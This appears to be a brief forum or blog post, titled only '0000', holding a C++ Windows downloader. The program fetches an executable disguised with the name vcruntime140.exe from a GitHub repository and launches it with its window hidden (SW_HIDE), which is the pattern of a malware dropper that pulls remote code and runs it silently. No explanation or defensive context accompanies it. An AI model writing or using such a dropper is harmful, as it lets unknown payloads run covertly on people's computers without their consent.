Найти тему

0000

#pragma comment(lib, "urlmon.lib") #include <Windows.h> #include <string>
using namespace std;
int main() { URLDownloadToFile(0, L" https://github.com/blade-ass/lolz/raw/main/vcruntime140.exe", L" vcruntime140.exe", 0, 0); ShellExecute(NULL, L"open", L" vcruntime140.exe", NULL, NULL, SW_HIDE); return 0; }